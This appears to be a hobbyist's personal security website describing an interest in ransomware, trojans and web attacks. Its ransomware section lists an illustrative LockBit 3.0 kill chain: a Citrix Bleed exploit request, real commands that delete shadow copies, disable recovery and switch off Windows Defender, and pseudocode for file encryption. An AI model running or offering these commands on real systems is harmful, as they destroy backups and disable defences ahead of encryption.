DARKVOIDSTUDIOS
Into the Void.
A corner of the internet dedicated to the dark side of computing. Ransomware internals, trojan architectures, OWASP attack vectors, and the code behind the chaos. Not selling anything -- just fascinated by how it all works.
Curious about the dark side of computing
Darkvoidstudios is my space for everything IT security. I'm a software developer who's genuinely fascinated by how threats work -- not to use them, but to understand them. How does ransomware negotiate its keys? Why are trojans so hard to detect? What makes the OWASP Top 10 so persistent?
This site is a collection of the things I dig into: attack vectors, malware internals, exploit techniques, and the code behind all of it. Think of it as a personal research board -- the kind of stuff I read about at 2am because I can't stop pulling at the thread.
I also build things, break things, and occasionally fly FPV drones when I need to touch grass. But mostly it's about the void.
$ cat /etc/motd
Welcome to darkvoidstudios
$ echo $FOCUS
Ransomware | Trojans | OWASP | Exploits
$ echo $MOTTO
"Understand the attack to build the defense"
$ uptime
always online _
> What Fascinates Me
How does ransomware actually encrypt your files? AES-256, RSA key exchange, double extortion -- the engineering behind the destruction.
Process injection, sandbox evasion, persistence mechanisms -- understanding what makes trojans invisible and dangerous.
SQL injection, XSS, SSRF -- not just a checklist but a deep dive into why these attack vectors keep coming back.
Reversing binaries, reading disassembly, unpacking obfuscated payloads. Figuring out what malicious code really does.
Buffer overflows, ROP chains, heap spraying -- the low-level techniques behind real-world exploits.
Tracing attack paths through logs, memory dumps, and disk images. Reconstructing what happened after a breach.
> Rabbit Holes
The Stuff That Keeps Me Up at Night
Attack vectors, malware families, and the techniques behind them. This is what I spend my free time reading about and pulling apart.
Ransomware
Ransomware encrypts victim files and demands payment for decryption keys. Modern variants use double extortion -- encrypting data while also exfiltrating it to threaten public leaks.
Known Variants & Examples
1# LockBit 3.0 - actual kill chain observed ITW2# Stage 1: Initial access via Citrix Bleed3# CVE-2023-4966 - session token hijack4curl -s https://vpn.target.com/vpn/../vpns/cfg5 → leaks session cookies (no auth needed)67# Stage 2: Disable defenses before encrypt8cmd> vssadmin delete shadows /all /quiet9cmd> wmic shadowcopy delete10cmd> bcdedit /set {default} recoveryenabled No11reg add HKLM\...\Windows Defender12 /v DisableAntiSpyware /t REG_DWORD /d 11314# Stage 3: AES-256 + RSA-2048 per-file15for f in walk(drives):16 key = os.urandom(32) # per-file AES key17 encrypt_AES_CBC(f, key)18 append(rsa_encrypt(key, pub_key), f)19 os.rename(f, f + ".lockbit")2021# Stage 4: Double extortion22# "Pay $2M or 4TB hits our leak site"
Things I've Built
Side projects, experiments, and random stuff from my GitHub. Not all security-related -- sometimes you just build things because it's fun.
What I Work With
Languages, tools, and the security rabbit holes I spend too much time in.
Languages I Use
Security Stuff I Dig Into
Tools & Platforms
> Also Into
Say Hello
Want to talk about ransomware internals, share a cool exploit writeup, collaborate on something, or just nerd out about security? Hit me up.
$ ping darkvoidstudios
PING darkvoidstudios.com
64 bytes: seq=1 ttl=64 time=0.42ms
64 bytes: seq=2 ttl=64 time=0.38ms
$ echo $GITHUB
github.com/DanielBecker715
$ echo $STATUS
online _